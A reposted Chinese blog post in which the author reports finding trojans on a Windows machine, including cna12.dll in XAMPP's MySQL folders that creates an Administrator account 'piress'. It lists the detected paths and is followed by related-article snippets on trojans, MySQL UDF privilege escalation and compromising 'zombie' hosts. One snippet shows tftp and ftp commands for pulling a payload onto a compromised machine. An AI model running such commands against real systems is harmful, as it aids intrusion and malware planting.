传到肉鸡的木马名称(随意写)

最新推荐文章于 2021-05-15 07:11:40 发布
最新推荐文章于 2021-05-15 07:11:40 发布
阅读量291 收藏
点赞数
文章标签: 数据库 python
原文链接:https://my.oschina.net/u/699015/blog/382078
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

今天偶然使用了一下Windows的病毒检查工具,居然发现了一大堆的木马,其中还有一个非常搞笑的名称叫:“file:C:\Windows\SysWOW64\传到肉鸡的木马名称(随意写)”的。

然后进一步又发现XAMPP的MySQL里居然也有木马:cna12.dll,该木马会在系统里创建一个叫piress的账号,而且是Administrator权限的,杀之。 

containerfile:D:\AppServers\xampp-1.8.2\mysql\bin\cna12.dll
containerfile:D:\AppServers\xampp-1.8.2\mysql\lib\plugin\cna12.dll
file:D:\AppServers\xampp-1.8.2\mysql\bin\cna12.dll
file:D:\AppServers\xampp-1.8.2\mysql\bin\cna12.dll->(UPX)
file:D:\AppServers\xampp-1.8.2\mysql\lib\plugin\cna12.dll
file:D:\AppServers\xampp-1.8.2\mysql\lib\plugin\cna12.dll->(UPX)




转载于:https://my.oschina.net/u/699015/blog/382078

weixin_33696106
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
肉鸡的俘虏!一个菜鸟木马黑客的自白
baiyupiaopiao的专栏
08-04 5550
曾几何时,在计算机技术人员眼中,黑客还被当成了天才来膜拜。即使到了中国所特有的红客出现,也因为所谓的正义感而尚能被网民接受。但在目前这个几乎全民皆可以做黑客的时代,黑客守则中的不恶意破坏任何系统已无人遵守,黑客精神被彻底抛弃。   在赤裸裸的金钱诱惑下,天天都有数不清的人怀着各
木马内网介绍一下常见的木马种类
weixin_34376562的博客
05-19 402
本文是一篇关于木马内网的帖子     目前罕见的木马有三种:正向连接木马、反弹连接木马、收信木马。               正向连接木马,所谓正向,就是在中马者在呆板上开个端口,而我们去连接他的端口。而我们要知道他的IP,才能够连接他。123就是他呆板上开的端口。               由于到现在,宽带上彀(动态IP)和路由器的广泛,这个软件就有很大的缺乏。      ...
Linux主机肉鸡木马minerd导致CPU跑满
chepei9387的博客
06-22 160
摘要:Linux主机肉鸡木马minerd导致CPU跑满 【问题现象】 Linux主机CPU跑满,或者使用服务器越来越慢,以及收到报警信息提示服务器有对外恶意扫描。 【问题原因】 这种状况在出现时通过top命令可以看到有一个minerd进程占用CPU较高。 Linux主机肉鸡木马minerd...
几种肉鸡上传文件的方法
人生代码,代码人生。。。
12-23 1556
【IT168 黑客攻防】tftp法   先在自己某机器上建个tftp服务器,如执行tftpd32.exe,   再将文件(sample.exe)上传到别的机器中(肉鸡),   肉鸡cmd中执行: tftp -i 服务器ip get sample.exe    ftp法   肉鸡cmd中执行:   echo open ftp服务器ip [端口]>ftp.txt   
python dll_python3.dll,下载,简介,描述,修复,等相关问题一站搞定_DLL之家
weixin_39717865的博客
11-23 604
如何选择&使用第一步:您从我们网站下载下来文件之后,先将其解压(一般都是zip压缩包)。第二步:然后根据您系统的情况选择X86/X64,X86为32位电脑,X64为64位电脑。 如果您不知道是X86还是X64,您可以点此链接检测。第三步:根据软件情况选择文件版本。此步骤比较复杂,如果是Windows的dll文件,版本号以5.0开头的或含有 nt 一般是windows2000的文件。版本号以5.1开...
2020年中国肉鸡行业概览.pdf
03-05
2020年中国肉鸡行业概览.pdf
2021年肉鸡行业研究报告
05-22
2021年肉鸡行业研究报告
YOLOv3养殖场肉鸡健康状态检测权重+数据集
05-25
YOLOv3养殖场肉鸡健康状态检测权重,包含养殖场肉鸡健康状态检测数据集 ;数据集目录已经配置好,划分好 train,val, test,并附有data.yaml文件,yolov5、yolov7、yolov8,yolov9等算法可以直接进行训练模型,txt...
肉鸡屠宰、包装、存储发货作业指导书.doc
01-12
该文档是关于肉鸡屠宰、包装、存储发货的作业指导书,主要涵盖了四个核心环节:毛鸡验收、卸车过磅、洗笼上车、吊挂电麻。这些步骤都是为了确保食品安全、卫生以及生产效率。 1. **毛鸡验收**: - 目的:验证鸡只...
YOLOv10养殖场肉鸡健康状态检测权重+数据集
最新发布
06-29
YOLOv10养殖场肉鸡健康状态检测权重,包含养殖场肉鸡健康状态检测数据集 ;数据集目录已经配置好,划分好 train,val, test,并附有data.yaml文件,yolov5、yolov7、yolov8,yolov9等算法可以直接进行训练模型,txt...
linux cna12.dll,攻击 MySQL 服务器传播 GandCrab 勒索软件
weixin_34534926的博客
05-15 124
研究人员在实验室环境中搭建了一个蜜罐系统,监听着 SQL 服务器使用的默认端口(TCP/3306 端口)。该蜜罐系统发现来自美国机器的攻击。研究人员监控了僵尸网络生成的网络流量和行为,发现该 Linux 蜜罐下载了一个 Windows 可执行文件。攻击者首先用 SQL 数据库命令在上传 helper DLL 到服务器,然后作为数据库函数调用该 DLL 来提取 IP 地址位于加拿大魁北克省的主机上的...
关于amd.dll后门病毒入侵3306端口的临时解决方案
纪敏强的博客
09-01 322
amd.dll入侵事宜: 由于MySQL 5.1.30以上版本的一个漏洞(当然是不是因为漏洞的原因,目前暂未知),导致一个后门程序会通过3306端口的MySQL服务获取到Windows的管理权限,并在系统中产生amd.dll基本后门程序,并不断释放boot1.exe/boot2.exe/12345.exe/net.exe/net1.exe....等等垃圾程序,并在系统分区根目录,Window...
攻击MySQL服务器传播GandCrab勒索软件
systemino的博客
05-28 310
研究人员在实验室环境中搭建了一个蜜罐系统,监听着SQL服务器使用的默认端口(TCP/3306端口)。该蜜罐系统发现来自美国机器的攻击。研究人员监控了僵尸网络生成的网络流量和行为,发现该Linux蜜罐下载了一个Windows可执行文件。 攻击者首先用SQL数据库命令在上传helper DLL到服务器,然后作为数据库函数调用该DLL来提取IP地址位于加拿大魁北克省的主机上的GandCrab pa...
Linux卸载MySQL总结
liuchaoxue
02-24 834
    RPM包安装方式的MySQL卸载 1: 检查是否安装了MySQL组件。  MySQL的安装主要有三种方式:二进制包安装(Using Generic Binaries)、RPM包安装、源码安装。   [root@DB-Server init.d]# rpm -qa | grep -i mysql   MySQL-devel-5.6.23-1.linux_g...
由MySql漏洞导致电脑被入侵(特征为新增加名为piress的帐户)所想到的
Simple life
08-22 2万+
题记 今天开机,突然发现新增了一个名为piress的账户,突然间就意识到我的电脑可能被入侵了。后来发现网上很多人都遇到这样的问题。经过一步步的查证,原来最近mysql爆出一个安全漏洞,远程登录mysql,尝试225次后就可以绕过身份验证登录到数据库。我很悲催,刚装上MySql就被别人扫描3306端口,然后远程种木马了…… 经过 1、网上搜索相似案例,然后F8进安全模式,删除pires
Mysql安装udf调用系统程序问题解决
暴烈骑士的专栏
12-05 7615
安装udf调用系统程序,在使用编译出的lib_mysqludf_sys.so遇到了 1. failed:FUNCTION ramsdb.sys_exec does not exist! 2. ERROR 1126 (HY000): Can’t open shared library ‘lib_mysqludf_sys.so’ 在此提供完整的安装过程
Mysql udf提权(Linux平台)
热门推荐
3569
12-17 2万+
http://vinc.top/2017/04/19/mysql-udf%E6%8F%90%E6%9D%83linux%E5%B9%B3%E5%8F%B0/ UDF是MySQL的一个共享库,通过udf创建能够执行系统命令的函数sys_exec、sys_eval,使得入侵者能够获得一般情况下无法获得的shell执行权限 网上有些文章利用的是sqlmap-master\udf\mysq
如何检查自己的电脑是不是中了肉鸡木马
04-24 2814
<!-- alimama_pid="mm_10249644_1605763_4929893"; alimama_titlecolor="707070"; alimama_descolor ="CCCCCC"; alimama_bgcolor="FFFFFF"; alimama_bordercolor="FFFFFF"; alimama_linkcolor="DADA
kali linux捉肉鸡教程
10-27
2. 利用漏洞或社会工程学攻击技术,将木马程序安装到目标计算机上。 3. 在Kali Linux中使用msfconsole工具,设置监听器,等待目标计算机连接。 4. 一旦目标计算机连接到监听器,攻击者就可以获得对该计算机的控制权...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值